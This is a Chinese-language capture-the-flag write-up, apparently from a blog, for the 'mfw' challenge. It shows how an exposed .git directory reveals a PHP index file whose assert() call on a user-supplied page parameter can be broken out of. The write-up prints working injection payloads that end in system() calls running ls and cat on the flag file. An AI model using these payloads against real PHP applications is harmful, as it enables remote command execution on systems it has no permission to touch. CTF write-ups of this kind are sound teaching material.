mfw git泄露构造闭合

这题也挺有想法 第一次确实没有想到

首先我们可以扫出 git

然后

我们githack 泄露一下

然后我们看index.php代码

复制代码
<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

问题代码出现在

复制代码
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

这里的参数是可以闭合的 因为是可控的


我们构造 ')


assert("strpos('')', '..') === false") or die("Detected hacking attempt!");

然后我们可以在后面面接上其他php语句


这里有两个


').system("ls");//


或者

') or system("ls");//

最后payload

就是替换为cat即可

复制代码
/?page=').system("cat ./templates/flag.php");//
相关推荐
程序猿chen1 小时前
《JVM考古现场(十五):熵火燎原——从量子递归到热寂晶壁的代码涅槃》
java·jvm·git·后端·java-ee·区块链·量子计算
前端三叶草4 小时前
git subtree 最佳实践
git
Code_Geo6 小时前
Git操作指南
git
阳光_你好8 小时前
解决用git bash终端 tail -f 命令查看日志中文乱码问题
开发语言·git·bash
geekmice16 小时前
多个git账户团队写作
git
森叶17 小时前
linux如何与windows进行共享文件夹开发,不用来回用git进行拉来拉去,这个对于swoole开发者来说特别重要
linux·git·swoole
qziovv17 小时前
GIT 撤销上次推送
git
Cloud_Air75418 小时前
本地合并多个仓库,保留Commit历史
git·github
high201120 小时前
【Git】-- 处理 Git 提交到错误分支的问题
git
axinawang21 小时前
在eclipse中通过git放弃某个版本之前所有的更新
git